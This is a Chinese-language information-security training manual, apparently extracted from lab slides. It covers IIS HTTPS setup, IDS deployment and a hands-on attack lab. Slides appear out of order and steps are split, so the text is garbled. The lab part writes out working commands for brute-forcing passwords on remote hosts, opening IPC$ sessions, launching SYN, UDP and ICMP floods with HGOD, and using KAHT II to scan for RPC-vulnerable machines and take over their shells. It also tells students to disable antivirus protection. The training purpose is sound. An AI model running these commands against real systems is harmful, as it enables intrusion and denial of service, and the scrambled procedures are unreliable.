信息安全操作手册

查看“网络审计”菜单中的“报警事件”，“攻击检测”，“内容恢复”，“应用 审计”，“策略设置”，“连接审计”等功能情况。 进入菜单‘系统维护’－“策略设置”中，查看IDS各检测的策略类型情况
了解东软IDS功能情况
打开“东软IDS”的演式文档(D:\SOFT\东软IDS内）, 对应IDS软件菜单中实现的各功能情况.
入侵检测系统(IDS)连接方式
硬件安装：入侵检测系统接入方式之HUB
注意事项： 对于交换式HUB来说和交换机连接方法类似
Biblioteka Baidu
入侵检测系统连接方式
硬件安装：入侵检测系统接入方式之交换机
注意事项： 镜像多个源端口可能导致镜像端口丢包 应对收发端口同时进行镜像
监听多个子网情况
Firewall Switch 被监控子网 1
IP :192.168.0.10 /20
分为二大组，每组一台IDS”和六台电脑
IDS安全管理器
•本实训采用“东软”IDS，配置软件已安装。 •从“程序”中打开Neteye IDS 软件的 “安全管理器”， 登陆IP地址为： 192.168.0.100 或 192.168.0.200 登陆用户名为： user1/2/3/4/5/6/7 口令:123456
2. 本地口令破解实验
• • 利用 LC 5（L0phtCrack）用本机暴力破解系统用户及密码。 安装LC5
进入LC5导航模式,选取本地主机
按默认提示继续，选择第一个本地破解， 在选择审计方式时， 选择定制合适的组合算法.开始破解口令
远程主机口令破解实验
利用NAT(NetBIOS Auditing Tools)来破解局域网内远程主机口令 （DOS使用请看FTP服务器上《DOS的使用方法》 在DOS下进入NAT所在目录, 输入： NAT –o 文件名.txt –u user.txt -p pass.txt 远端主机IP -p 为口令文件。远端主机可以根
其中参数指： -o 为输出文件 据’安全扫描’中扫描的IP
-u 为 用户名文件
完成后打开生成的文件名查看对方用户口令. （文件中有CONNECTED 的一行是通过了验证的用户口令） 注: NAT是通过带有简单密码的pass.txt字典文件来枚举暴力破解的,如果口令复杂,需要 字典生成软件来生成复杂口令文件！ (用DICTMAKER看一下怎么生成字典文件? ) 口令要设置8位以上且混有字母、数字、符号才不易被破解. 暴力破解最重要的是一个好 的字典。
3. 空连接
•利用Windows的IPC$建立netbios空连接会话 获取部分net命令权限. •net use \\主机ip\IPC$
""
/user:""
•命令成功完成即表示连接成功，在目标主机上用netstat –n观察TCP连接， 判断该漏洞利用的是哪个TCP Port? •可执行部分命令查询目标主机的一些信息： • net time \\主机ip 查看时间 • nbtstat –A 主机ip –c 查看共享访问的缓存记录
Switch
被监控子网 2
• •
说明： IDS支持监听口的扩充； 用在多监听口情况. (如只有一个监听口,则只能监听一端交换机. )
IDS
IDS做为一种旁路设备.有几大优点:第一，不会改变企业现有网络拓 扑，保证了部署的简单高效；第二，旁路设备对于性能的要求并 不苛刻，保证了性价比；第三，旁路设备以预警报告代替发起行 动，可以减少误报带来的损失.
配置过程:
•6、再次打开虚拟目录：certsrv ，点击页面右上角的“主页”链接，选择 “检查挂起的证书”，下载并保存CA证书文件。 •7、 打开IIS WEB默认站点属性，在“目录安全性”中，选择“服务器证 书”， 选择“处理挂起的请求并安装证书” ，并打开上一步下载的证书 文件,然后进行安装。 •8、在WEB站点中,设置SSL端口为:443 ,在“目录安全性”中，“安全通 信”项内的“编辑”中，设置“要求安全通道（SSL) ”， “忽略客户端证 书”，这样就可以强制要求通过SSL验证。 •9、通过HTTPS 访问该默认站 。（在IE中用 https://本机IP ) 第一部分要求每人至少操作一次！
A
??? Hacker
B服务器
配置过程:
IIS中部署HTTPS步骤: 1.进入WINDOWS2000高级服务器操作系统。 在“添加/删除程序”中，安装“证书服务”组件。
(安装提示内容输入可任意。安装路径目录及共享文件夹按默认设置，不需 更改。 安装提示时所需文件在D:\soft\win2k内查找. )
5. RPC漏洞入侵实验
•利用KAHT II 工具入侵系统 • 打开KAHT2,了解使用说明. 参考如下范例： 对本网段IP主机范围扫描找寻“肉鸡” ，进入DOS下kaht2所在目录： • 命令格式： kaht2 开始IP
结束IP
•当发现第一个“肉鸡” ，kaht II会立即切换到“肉鸡”的command shell。 •在”肉鸡”的command shell下操作命令: •Ipconfig /all 查看肉鸡信息 •netstat –n 查看入侵的TCP Port连接 •如同在本机一样可执行全部系统和网络管理命令 •Exit退出“肉鸡”系统，KAHT II会继续扫描找寻下一个“肉鸡”
第二部分： 网络攻防与IDS检测
功能
•IDS (Intrusion Detection System 入侵检测系统)是指对入侵行为的发 觉，通过对计算机网络系统中的若干关键点收集信息并对其进行分析， 从中发觉网络系统中是否有违反安全策略的行为或被攻击的迹像。 •功能： 监测分析用户和系统的活动。 核查系统配置和漏洞。 评估系统关键资源和数据系统的完整性。 识别已知的攻击行为。 统计分析异常行为。 操作系统日常管理，并识别违反安全策略的用户活动。
信息安全实训 操作手册
Http://www.Hwadee.com 华迪. 信息安全实训中心
第一部分： IIS部署HTTPS服务 第二部分：网络攻防与IDS检测 第三部分：WSUS自动升级配置 第四部分：Redhat基本操作与高级配置 第五部分: 安全工具的使用
第一部分： IIS布署HTTPS服务
• HTTPS协议(TCP:443)使用SSL(Secure Socket Layer) 在发送方把原始数据进行加密，然后在接受方进行解密， 加密和解密需要发送方和接受方通过交换共知的密钥来实 现，因此，所传送的数据不容易被网络黑客截获和解密。
HTTPS://192.168.1.1
HUB
192.168.1.1
安全管理器, 报表管理器, 集中管理器, 审计管理器, 实时监控系统, 脱机浏览器, 用户管理器.
网络攻防与IDS检测实训内容
•1. 安全扫描 •2. 口令破解 •3. 空连接入侵实验 •4. DOS攻击实验 •5. RPC漏洞入侵实验 •6. 提升用户权限 •7. IIS漏洞入侵实验 •8. NC后门程序部署实验 •9. SQL Server漏洞入侵实验 •10. 木马程序值入 •11. PStools远程管理 •12.清除脚印痕迹 •13.系统安全审计 •14.数据包分析
学习入侵攻击的目的
入侵攻击只是相对的.要有存在攻击的可能才行.一般 利用口令和漏洞方式。 学习的目的不是为了攻击别人,而是为了怎样防范攻 击,并加强安全意识.
1. 安全扫描
•用下列软件进行主机和漏洞扫描. 查看本网内有哪些主机存在和主机有哪些端口开放?
• （所需软件在服务器FTP://192.168.0.1上） •项目1： 使用Superscan对本网段内所有主机进行扫描。 • 查看扫描结果中主机与端口开放情况。 •项目2： •使用X-SCAN对本网段内所有主机进行扫描。 •查看扫描结果中主机与端口情况漏洞情况。 •项目3: • 其他工具的扫描. 如:弱口令检查, 漏洞扫描工具,绿盟扫描器
IIS访问日志分析
1. 安装逆火日志分析软件Nwlacn.exe （d:\soft\tools目录内） 2. 在IIS默认站点属性中,根据需要设置IIS扩展日志记录属性中字段. 3. 让其他主机访问本机WEB服务器,以生成访问的记录。 4. 进入逆火WEB日志分析软件，进入NEW新建向导，导入(Brower)最新日志文件 (c:\winnt\system32\Logfiles\W3svc1下最新日期文件) ，通过该软件分析(Analyize) 访问日志文件, 查看其他主机访问本机的日志记录。
入侵系统的常见步骤
判断 系统 提 升 为 最 高 权 限 攻击其 他系统
端口 判断 分析 可能 有漏 洞的 服务
选择 最简 方式 入侵
获取 系统 一定 权限
安装 多个 系统 后门
清除 入侵 脚印
获取敏 感信息
作为其 他用途
本实验主要按以下步骤进行: 安全扫描-口令破解/漏洞攻击- 值入木马/提升权限 – 攻击- 清除脚印.
（注意不得退出杀毒软件）
DoS攻击实验
打开HGOD软件，解压到一个目录内，通过CMD进入DOS，进入该目录。 使用hgod -h 命令了解各项参数帮助. (1) SYN Flood 攻击 格式： hgod 目标主机IP 80,135,139,445 -t:5 同时在目标主机上用命令netstat –an观察tcp连接情况 (2) DrDos 攻击 格式： hgod 目标主机IP 80 -m:drdos -t:5 -n:200 同时在目标主机上用命令netstat –an观察tcp连接情况 (3) UDP Flood 攻击 格式： hgod 目标主机IP 137,138,445,3456,4000 -m:udp -t:5 同时在目标主机上用命令netstat –s观察UDP Statistics增长情况 (4) ICMP Flood 攻击 格式： hgod 目标主机IP 1 -m:icmp -t:5 同时在目标主机上用命令netstat –s观察ICMP Statistics增长情况 攻击中通过IDS的“网络审计”中的“攻击检测”和“实时报警”来查看攻 击情况。
ipc$连接
•利用Windows的IPC$建立netbios空连接会话 获取部分net命令权限. •net use \\主机ip\IPC$
"输入前面破解的口令"
/user: "administrator "
•命令成功完成即表示入侵成功。引号必须输入。 • 在电脑上进入“开始”菜单—“运行” 输入 \\目标主机IP\ 打开其资源界面 在目标主机上用netstat –n观察TCP连接，判断该漏洞利用的是哪个TCP Port? •可执行部分命令查询目标主机的一些信息： • net time \\主机ip 查看时间 • nbtstat –A 主机ip –c 查看共享访问的缓存记录 • net use \\主机ip\IPC$ /delete 断开IPC$连接
4. DoS攻击实验
•D.O.S 是目前一种常见的攻击方式. •DoS ( Denial of Service) 指的是拒绝服务攻击 DDoS ( Distributed Denial of Service )指的是分布式拒绝服务攻击 DOS攻击可以造成目标主机性能下降及影响网络传输速度。 •利用HGOD工具软件实现SYN/DrDoS/UDP/ICMP/IGMP网络半连接攻击。 •为了避免该软件被杀毒软件删除，进入右下角NOD32杀毒软件， 把“防护”－“文件监控”－“启用文件系统实时监控”选项取消 。
•2、进入管理工具，在IIS (Internet信息服务） WEB默认站点中，检查网页路径和主 文档，能够通过HTTP可以访问。 •3、在该站点属性中，进入“目录安全性”，选择“服务器证书” ，选择“创建一个新证 书”，设置各项名称，保存文件certreg.txt在一个路径下。 •4、在IIS WEB默认站点中，“浏览”虚拟目录：Certsrv , “申请证书”－－申请类型 为：“高级申请” －－“使用BASE64编码的PKCS#10文件提交证书申请”－－ “BASE 编码 为上一步certreg.txt文件中的文本内容。然后提交。 •5、在管理工具中“证书颁发机构”中， 对“待定申请”项的最新申请进行颁发。
实验图
IP :192.168.0.150/160 共享式 HUB连接 共享式 HUB连接 IP :192.168.0.50/60
IP :192.168.0.130/140
IP : IP : 192.168.0.200192.168.0.100 IP :192.168.0.30/40
IP :192.168.0.110/120